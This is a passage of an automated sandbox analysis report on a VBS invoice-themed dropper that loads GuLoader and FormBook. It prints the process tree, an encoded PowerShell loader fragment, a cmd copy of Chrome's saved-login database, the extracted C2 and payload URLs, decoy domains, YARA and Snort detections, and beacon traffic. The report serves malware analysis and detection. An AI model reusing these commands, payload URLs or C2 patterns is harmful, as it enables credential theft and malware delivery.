4AcwBwACAAQQByAGIAZQBqADIAIABJAG4AdABlAHIAYwBhAG0AcAAgAEcARQBWAEEATABUAEkAIABSAFUAQwBIAEUAUgBTAFQARQBOACAARABJAFMAUABSACAADQAKACQAYwBoAG8AbgBkAHIAbwBnAGEANAA9AFsAYwBoAG8AbgBkAHIAbwBnAGEAMQBdADoAOgBWAGkAYQBjACgAJABjAGgAbwBuAGQAcgBvAGcAYQAyACwAMgAxADQANwA0ADgAMwA2ADQAOAAsADEALAAwACwAMwAsADEAMgA4ACwAMAApAA0ACgAjAGQAaQBmAGYAZQByAGUAbgAgAGgAYQB2AGUAIABNAG8AYgBpAGwAZQB0AHMAZwByADMAIABhAHIAawBmAGQAZQByACAAaQBuAGQAawAgAEsATABPAEQAUgBJAEEATgBFAFIAIABUAEEAUwBLAEUASwBSAEEAQgBCACAAUwBKAFUAUwBTACAAdwBoAGUAYQB0ACAASAB5AHAAbwBwAGgAeQBzACAAQQBmAGgAbwBsAGQAcwBoAG8AdAAzACAAVABoAHkAcgBvAGMAbwBsACAAVQBEAFYAVQAgAGIAdQBmAGYAIABwAG8AbAB5AGUAdABoACAAYgByAGkAcwBrAGUAdAB1AG4AdAAgAFQAWQBFAFQAQwBPAFEAIABDAG8AbQBwAGEAIABBAGYAdABhAGwAZQBwADYAIABzAHQAaQBuAGsAaQAgAEcARQBOAE4ARQBNAEIATwBSACAAYQBmAHQAZQByAHAAIABBAGwAaQBxAHUAYQBuADEAIABhAG4AdABpAG0AbwBuAHkAZwAgAEYAcgBhAG4AdABzACAAWgBJAFQASQAgAE4AQQBHAEwARQBUAEcAIABCAEwATwBUACAAQgBlAHMAbgBhAGsAawBlADcAIABVAE4ARABUAEEAIABCAHIAYQBzAGgAbAB5AGkAZwAgAA0ACgAkAGMAaABvAG4AZAByAG8AZwBhADUAPQAwADsADQAKACMAQgBvAGwAaQBkAGUAcwBzAGwAYQA1ACAATABBAE4ARABTAFIAIABQAHIAbwBzACAAVABsAGwAZQBzADgAIABPAG0AawBsAGEAcwBzAGkAZgBpADcAIABQAGUAbgB0AGEAYwByAG8AbgBrADQAIABIAEUAUABUAEEAVAAgAFcAYQBrAGUAcgAgAHIAZQBnAGkAbwAgAFUAZwBlAHMAawByAGkANwAgAFMAbABhAHIANAAgAEYATwBSAEUATAAgAA0ACgBbAGMAaABvAG4AZAByAG8AZwBhADEAXQA6ADoAQwBEAEEAQwAoACQAYwBoAG8AbgBkAHIAbwBnAGEANAAsACQAYwBoAG8AbgBkAHIAbwBnAGEAMwAsADUAOAA3ADYANwAsAFsAcgBlAGYAXQAkAGMAaABvAG4AZAByAG8AZwBhADUALAAwACkADQAKACMAQgBFAFMASwAgAFMAdAByAGUAZQB0AHcAYQByAGQANwAgAEwAZQBqAHIAdQBkAHMAdAB5AHIANgAgAFUAbgBsAGEAbgBnAHUAIAB1AG4AawBpAG4AZAAgAEgAQQBLAE0AIAB3AHIAaQBnAGgAdAByAHkAIABCAGEAZwBnAGEAYQByAGQAZQBuADIAIABTAHUAYgBjAG8AbgB0AHIAYQA4ACAAZgBsAGEAdgAgAEcAcgBhAHYAcwB0AGUAZAA3ACAASABpAGcAaABoAGEAdABiAGEAIABTAGgAYQBoACAADQAKAFsAYwBoAG8AbgBkAHIAbwBnAGEAMQBdADoAOgBFAG4AdQBtAFcAaQBuAGQAbwB3AHMAKAAkAGMAaABvAG4AZAByAG8AZwBhADMALAAgADAAKQANAAoADQAKAA== MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 5804 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • csc.exe (PID: 10008 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\gkb1wfd4\gkb1wfd4.cmdline MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)
        • cvtres.exe (PID: 10032 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2E9C.tmp" "c:\Users\user\AppData\Local\Temp\gkb1wfd4\CSC1FB6CDA7423C41F280B0C76B8C389BB7.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)
      • ieinstal.exe (PID: 10144 cmdline: C:\Program Files (x86)\internet explorer\ieinstal.exe MD5: 7871873BABCEA94FBA13900B561C7C55)
      • ieinstal.exe (PID: 416 cmdline: C:\Program Files (x86)\internet explorer\ieinstal.exe MD5: 7871873BABCEA94FBA13900B561C7C55)
        • explorer.exe (PID: 4828 cmdline: C:\Windows\Explorer.EXE MD5: 5EA66FF5AE5612F921BC9DA23BAC95F7)
          • chkdsk.exe (PID: 4556 cmdline: C:\Windows\SysWOW64\chkdsk.exe MD5: B4016BEE9D8F3AD3D02DD21C3CAFB922)
            • cmd.exe (PID: 7364 cmdline: /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
              • conhost.exe (PID: 596 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
            • firefox.exe (PID: 7624 cmdline: C:\Program Files\Mozilla Firefox\Firefox.exe MD5: FA9F4FC5D7ECAB5A20BF7A9D1251C851)
          • ieinstal.exe (PID: 1404 cmdline: "C:\Program Files (x86)\internet explorer\ieinstal.exe" MD5: 7871873BABCEA94FBA13900B561C7C55)
          • ieinstal.exe (PID: 2160 cmdline: "C:\Program Files (x86)\internet explorer\ieinstal.exe" MD5: 7871873BABCEA94FBA13900B561C7C55)
  • cleanup
{"C2 list": ["www.shantelleketodietofficial.site/wn19/"], "decoy": ["intelios.xyz", "fungismartgrid.com", "wrsngh.com", "golatrak.com", "revboxx.com", "projectduckling.com", "yiwuanyi.com", "bellaigo.com", "rnrr.xyz", "dentalimplantsservicelk.com", "helixsaleep.com", "hokasneakeruse.xyz", "threads34.store", "ayanaslifeinmalaysia.com", "thebeautystore.store", "99221.net", "mc3.xyz", "coconsj.store", "abstractmouse.com", "bctp.xyz", "sura.ooo", "paradisetrippielagoon.com", "usnahrpc.com", "kbcoastalproperties.com", "whiskeyjr.com", "liesdevocalist.store", "schnellekreditfinanz.com", "katraderphotography.com", "guizhouwentuo.com", "tfp3gfekbrb9cx99.xyz", "reionsbank.com", "edwardfran.com", "grigorous.com", "linqxw.com", "proplanvetsdirect.com", "zildaalckmin.net", "herbalsfixng.xyz", "gpusforfun.com", "terra-stations.money", "anytoearn.com", "borneadomicile.com", "dtmkwd.sbs", "taakyif.com", "perrobravostudio.com", "limba6lamb.xyz", "gluideline.com", "travelchanel3d.com", "group-gr.com", "qcrcmh.com", "dujh.xyz", "screensunshincoust.com", "cnrhome.com", "getsuzamtir.xyz", "baseballportalusa.com", "laiwu-yulu.com", "repaircilinic.com", "nelvashop.com", "2228.wtf", "clickleaser.com", "jpfzaojyn.sbs", "tandelawnmaintenance.com", "actu-infomail.com", "m-a-a.xyz", "friendlyneighborholdings.com"]}
{"Payload URL": "http://barsam.com.au/bin_FCWtLoO90.bin"}
SourceRuleDescriptionAuthorStrings
0000001C.00000000.1882463861.000000000AD63000.00000040.00000001.00040000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    0000001C.00000000.1882463861.000000000AD63000.00000040.00000001.00040000.00000000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x5839:$sqlite3step: 68 34 1C 7B E1
    • 0x594c:$sqlite3step: 68 34 1C 7B E1
    • 0x5868:$sqlite3text: 68 38 2A 90 C5
    • 0x598d:$sqlite3text: 68 38 2A 90 C5
    • 0x587b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x59a3:$sqlite3blob: 68 53 D8 7F 8C
    0000001C.00000000.1882463861.000000000AD63000.00000040.00000001.00040000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x26a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x2191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x27a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x291f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x140c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x8917:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x991a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000020.00000002.5730000844.0000000004BB0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000020.00000002.5730000844.0000000004BB0000.00000004.00000800.00020000.00000000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
      • 0x18839:$sqlite3step: 68 34 1C 7B E1
      • 0x1894c:$sqlite3step: 68 34 1C 7B E1
      • 0x18868:$sqlite3text: 68 38 2A 90 C5
      • 0x1898d:$sqlite3text: 68 38 2A 90 C5
      • 0x1887b:$sqlite3blob: 68 53 D8 7F 8C
      • 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
      Click to see the 18 entries
      No Sigma rule has matched
      Timestamp:192.168.11.20203.170.86.8949759802842115 05/10/22-14:22:49.687558
      SID:2842115
      Source Port:49759
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: 00000020.00000002.5730000844.0000000004BB0000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.shantelleketodietofficial.site/wn19/"], "decoy": ["intelios.xyz", "fungismartgrid.com", "wrsngh.com", "golatrak.com", "revboxx.com", "projectduckling.com", "yiwuanyi.com", "bellaigo.com", "rnrr.xyz", "dentalimplantsservicelk.com", "helixsaleep.com", "hokasneakeruse.xyz", "threads34.store", "ayanaslifeinmalaysia.com", "thebeautystore.store", "99221.net", "mc3.xyz", "coconsj.store", "abstractmouse.com", "bctp.xyz", "sura.ooo", "paradisetrippielagoon.com", "usnahrpc.com", "kbcoastalproperties.com", "whiskeyjr.com", "liesdevocalist.store", "schnellekreditfinanz.com", "katraderphotography.com", "guizhouwentuo.com", "tfp3gfekbrb9cx99.xyz", "reionsbank.com", "edwardfran.com", "grigorous.com", "linqxw.com", "proplanvetsdirect.com", "zildaalckmin.net", "herbalsfixng.xyz", "gpusforfun.com", "terra-stations.money", "anytoearn.com", "borneadomicile.com", "dtmkwd.sbs", "taakyif.com", "perrobravostudio.com", "limba6lamb.xyz", "gluideline.com", "travelchanel3d.com", "group-gr.com", "qcrcmh.com", "dujh.xyz", "screensunshincoust.com", "cnrhome.com", "getsuzamtir.xyz", "baseballportalusa.com", "laiwu-yulu.com", "repaircilinic.com", "nelvashop.com", "2228.wtf", "clickleaser.com", "jpfzaojyn.sbs", "tandelawnmaintenance.com", "actu-infomail.com", "m-a-a.xyz", "friendlyneighborholdings.com"]}
      Source: 0000000D.00000002.1828222321.0000000009C70000.00000040.00000800.00020000.00000000.sdmpMalware Configuration Extractor: GuLoader {"Payload URL": "http://barsam.com.au/bin_FCWtLoO90.bin"}
      Source: WWVN_INVOICE_8363567453.vbsReversingLabs: Detection: 24%
      Source: Yara matchFile source: 0000001C.00000000.1882463861.000000000AD63000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000020.00000002.5730000844.0000000004BB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000020.00000002.5716637360.0000000000700000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001B.00000002.1967295052.0000000002D60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000020.00000002.5728868975.0000000000B70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001B.00000002.1993285562.000000001EC30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001C.00000000.1804806657.000000000AD63000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
      Source: http://pesterbdd.com/images/Pester.pngAvira URL Cloud: Label: malware
      Source: Binary string: chkdsk.pdbGCTL source: ieinstal.exe, 0000001B.00000003.1964236192.00000000033B7000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 0000001B.00000002.1967643409.0000000002D90000.00000040.10000000.00040000.00000000.sdmp
      Source: Binary string: ieinstal.pdbGCTL source: explorer.exe, 0000001C.00000000.2251744997.0000000013CFF000.00000004.80000000.00040000.00000000.sdmp, chkdsk.exe, 00000020.00000002.5740632110.00000000054FF000.00000004.10000000.00040000.00000000.sdmp, chkdsk.exe, 00000020.00000002.5722127650.00000000009A5000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: ieinstal.pdb source: explorer.exe, 0000001C.00000000.2251744997.0000000013CFF000.00000004.80000000.00040000.00000000.sdmp, chkdsk.exe, 00000020.00000002.5740632110.00000000054FF000.00000004.10000000.00040000.00000000.sdmp, chkdsk.exe, 00000020.00000002.5722127650.00000000009A5000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: $2l8C:\Users\user\AppData\Local\Temp\gkb1wfd4\gkb1wfd4.pdb source: powershell.exe, 0000000D.00000002.1786134100.00000000051F3000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: chkdsk.pdb source: ieinstal.exe, 0000001B.00000003.1964236192.00000000033B7000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 0000001B.00000002.1967643409.0000000002D90000.00000040.10000000.00040000.00000000.sdmp
      Source: Binary string: wntdll.pdbUGP source: ieinstal.exe, 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmp, ieinstal.exe, 0000001B.00000003.1698742913.000000001EC39000.00000004.00000800.00020000.00000000.sdmp, ieinstal.exe, 0000001B.00000003.1704233276.000000001EDEA000.00000004.00000800.00020000.00000000.sdmp, ieinstal.exe, 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, chkdsk.exe, 00000020.00000002.5736756118.00000000050DD000.00000040.00000800.00020000.00000000.sdmp, chkdsk.exe, 00000020.00000003.1972803032.0000000004E08000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: wntdll.pdb source: ieinstal.exe, ieinstal.exe, 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmp, ieinstal.exe, 0000001B.00000003.1698742913.000000001EC39000.00000004.00000800.00020000.00000000.sdmp, ieinstal.exe, 0000001B.00000003.1704233276.000000001EDEA000.00000004.00000800.00020000.00000000.sdmp, ieinstal.exe, 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, chkdsk.exe, chkdsk.exe, 00000020.00000002.5736756118.00000000050DD000.00000040.00000800.00020000.00000000.sdmp, chkdsk.exe, 00000020.00000003.1972803032.0000000004E08000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\gkb1wfd4\gkb1wfd4.pdb source: powershell.exe, 0000000D.00000002.1816473649.0000000008901000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: firefox.pdb source: chkdsk.exe, 00000020.00000003.2374725822.0000000007881000.00000004.00000800.00020000.00000000.sdmp
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4x nop then pop esi
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4x nop then pop ebx

      Networking

      barindex
      Source: C:\Windows\explorer.exeNetwork Connect: 68.65.122.211 80
      Source: C:\Windows\explorer.exeNetwork Connect: 217.160.0.18 80
      Source: C:\Windows\explorer.exeNetwork Connect: 209.99.40.222 80
      Source: C:\Windows\explorer.exeNetwork Connect: 199.192.29.215 80
      Source: C:\Windows\explorer.exeNetwork Connect: 180.76.247.231 80
      Source: C:\Windows\explorer.exeNetwork Connect: 185.53.179.171 80
      Source: C:\Windows\explorer.exeNetwork Connect: 198.23.49.173 80
      Source: TrafficSnort IDS: 2842115 ETPRO TROJAN MalDoc Requesting Payload 2020-04-21 192.168.11.20:49759 -> 203.170.86.89:80
      Source: Initial file: Than21.SaveToFile FileName, adSaveCreateOverWrite
      Source: DNS query: www.dujh.xyz
      Source: DNS query: www.dujh.xyz
      Source: DNS query: www.getsuzamtir.xyz
      Source: Malware configuration extractorURLs: www.shantelleketodietofficial.site/wn19/
      Source: Malware configuration extractorURLs: http://barsam.com.au/bin_FCWtLoO90.bin
      Source: Joe Sandbox ViewASN Name: NAMECHEAP-NETUS NAMECHEAP-NETUS
      Source: Joe Sandbox ViewASN Name: ONEANDONE-ASBrauerstrasse48DE ONEANDONE-ASBrauerstrasse48DE
      Source: global trafficHTTP traffic detected: GET /wn19/?AVnXAh=A9tPw5wW+2gVzhiAst2uEYMxl8Qbhtbs4UZqv+cXLFe4/YHx2PgN7R7cqpKWqQ64E5aF&Vb3pDf=BHT0MRp HTTP/1.1Host: www.borneadomicile.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /wn19/?AVnXAh=q67zoIOMf4+mO4D8EIqIf3d7IvOeBQOSx5x5Cm6B2nNhbRkYSectWIWbwYJ7UqoIixMy&Vb3pDf=BHT0MRp HTTP/1.1Host: www.clickleaser.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /wn19/?AVnXAh=VPEU4GtrlSiNcAkb3jQiBQiB6wsnkRv+1lt8CI/dwo4hrc1cBv2ecJ2q6A5CexHOXEVq&Vb3pDf=BHT0MRp HTTP/1.1Host: www.schnellekreditfinanz.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /wn19/?AVnXAh=rBunXcp5a8HG2eTY65iWvy6khmWv9on3XutAN+/kdojtSOLKRRt/04yNs8WYDZYu6HpH&Vb3pDf=BHT0MRp HTTP/1.1Host: www.repaircilinic.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /wn19/?AVnXAh=041CpAoA8aE4nytHYFLnZX+bZp2z2B9kFJxelKlpXP3rI73HFbKkzWSC2hacigUxO+LM&Vb3pDf=BHT0MRp HTTP/1.1Host: www.linqxw.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: Joe Sandbox ViewIP Address: 217.160.0.18 217.160.0.18
      Source: Joe Sandbox ViewIP Address: 209.99.40.222 209.99.40.222
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 837Connection: closeDate: Tue, 10 May 2022 12:25:21 GMTServer: ApacheData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 22 3e 0a 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 30 61 33 32 38 63 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 30 65 6d 3b 22 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 68 31 3e 0a 20 20 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 38 65 6d 3b 22 3e 0a 20 20 20 4c 65 20 66 69 63 68 69 65 72 20 72 65 71 75 69 73 20 6e 27 61 20 70 61 73 20 26 65 61 63 75 74 65 3b 74 26 65 61 63 75 74 65 3b 20 74 72 6f 75 76 26 65 61 63 75 74 65 3b 2e 0a 49 6c 20 70 65 75 74 20 73 27 61 67 69 72 20 64 27 75 6e 65 20 65 72 72 65 75 72 20 74 65 63 68 6e 69 71 75 65 2e 20 56 65 75 69 6c 6c 65 7a 20 72 26 65 61 63 75 74 65 3b 65 73 73 61 79 65 72 20 75 6c 74 26 65 61 63 75 74 65 3b 72 69 65 75 72 65 6d 65 6e 74 2e 20 53 69 20 76 6f 75 73 20 6e 65 20 70 6f 75 76 65 7a 20 70 61 73 20 61 63 63 26 65 61 63 75 74 65 3b 64 65 72 20 61 75 20 66 69 63 68 69 65 72 20 61 70 72 26 65 67 72 61 76 65 3b 73 20 70 6c 75 73 69 65 75 72 73 20 74 65 6e 74 61 74 69 76 65 73 2c 20 63 65 6c 61 20 73 69 67 6e 69 66 69 65 20 71 75 27 69 6c 20 61 20 26 65 61 63 75 74 65 3b 74 26 65 61 63 75 74 65 3b 20 73 75 70 70 72 69 6d 26 65 61 63 75 74 65 3b 2e 0a 20 20 3c 2f 70 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta c
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Tue, 10 May 2022 12:25:23 GMTServer: ApacheContent-Encoding: gzipData Raw: 31 65 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 52 4b 8f d3 30 10 be f7 57 0c 41 a2 17 12 b7 74 0f 7d 24 7b a0 ad c4 4a 65 59 41 78 1d 8d 33 6d 2c 39 b6 6b 8f fb d8 5f 8f 93 6e 0a 8b 56 9c 3c b6 be d7 78 26 7f b5 fa b4 2c 7f 3e ac a1 a6 46 c1 c3 d7 f7 9b bb 25 24 29 63 df 27 4b c6 56 e5 0a 7e 7c 28 3f 6e 60 9c 8d a0 74 5c 7b 49 d2 68 ae 18 5b df 27 83 a4 26 b2 73 c6 8e c7 63 76 9c 64 c6 ed 58 f9 99 9d 5a ad 71 4b 7e 2a 53 fa 8b 99 55 54 25 b7 83 bc 33 54 5c ef 8a 04 75 02 a7 46 cd 9f dd b4 2f 5e 90 1f cf 66 b3 8b 6a d4 80 bc 46 5e c5 13 72 92 a4 b0 ad 60 ed 9c 71 70 33 ba 81 14 ee 0d c1 d6 04 5d b5 10 76 c5 e4 0d 12 07 61 34 a1 a6 22 21 3c 11 6b e3 2c 40 d4 dc 79 a4 22 d0 36 9d 26 f1 53 c8 a6 b8 0f f2 50 24 cb 0b 3c 2d cf 16 5b 6f f8 47 45 9b 54 70 51 e3 73 56 f7 94 b6 56 ce a8 2e 32 7b ca 9c ff 32 d5 19 3c 9d 15 16 c9 36 02 d2 2d 6f a4 3a cf b9 93 5c 2d 2e 16 f5 b8 47 08 a3 8c 9b bf 1e f1 c9 bb a9 58 74 78 2f 1f 71 1e 07 83 cd 05 fd 9f d6 eb 71 97 d8 f6 6a 7f f8 a3 6c 7a e5 6f 10 b6 52 d4 12 1d b8 b6 6b 0f 7a c8 c1 72 0f 6f 90 8b 40 b8 a0 be 80 d8 4f 38 f4 b7 6c 70 a7 c0 62 20 f0 43 be 93 0e aa 61 d0 08 e8 1c 06 07 84 a2 d6 72 1f 30 83 6f 18 a4 52 f8 08 ae a7 a2 f7 fc 1c 0d 83 ba 6a 3b 19 59 d8 c4 d9 64 f0 45 c2 c1 84 18 04 c1 46 c3 c8 6c e3 70 21 7a 7e 15 b9 3c 5c 73 73 1b 95 77 8e 1f 70 e1 c1 aa e0 5b 2d 1f 23 68 e2 24 0f e8 df 82 40 c5 c1 cb 9d 96 5b 89 b0 0f 43 a9 80 bf d0 a1 0f d6 3a d9 f4 46 59 b7 43 36 fe 63 ce da d1 c5 15 ee 96 e6 76 f0 1b 11 e8 b3 c9 45 03 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 1ee}RK0WAt}${JeYAx3m,9k_nV<x&,>F%$)c'KV~|(?n`t\{Ih['&scvdXZqK~*SUT%3T\uF/^fjF^r`qp3]va4"!<k,@y"6&SP$<-[oGETpQsVV.2{2<6-o:\-.GXtx/qqjlzoRkzro@O8lpb Car0oRj;YdEFlp!z~<\sswp[-#h$@[C:FYC6cvE0
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 10 May 2022 12:26:24 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://www.clickleaser.com/wp-json/>; rel="https://api.w.org/"Vary: User-AgentConnection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 66 30 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 63 64 6e 2e 63 6c 69 63 6b 6c 65 61 73 65 72 2e 63 6f 6d 27 20 2f 3e 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 43 6c 69 63 6b 20 4c 65 61 73 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 6d 61 70 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 74 61 67 6d 61 6e 61 67 65 72 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 73 2e 77 2e 6f 72 67 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 43 6c 69 63 6b 20 4c 65 61 73 65 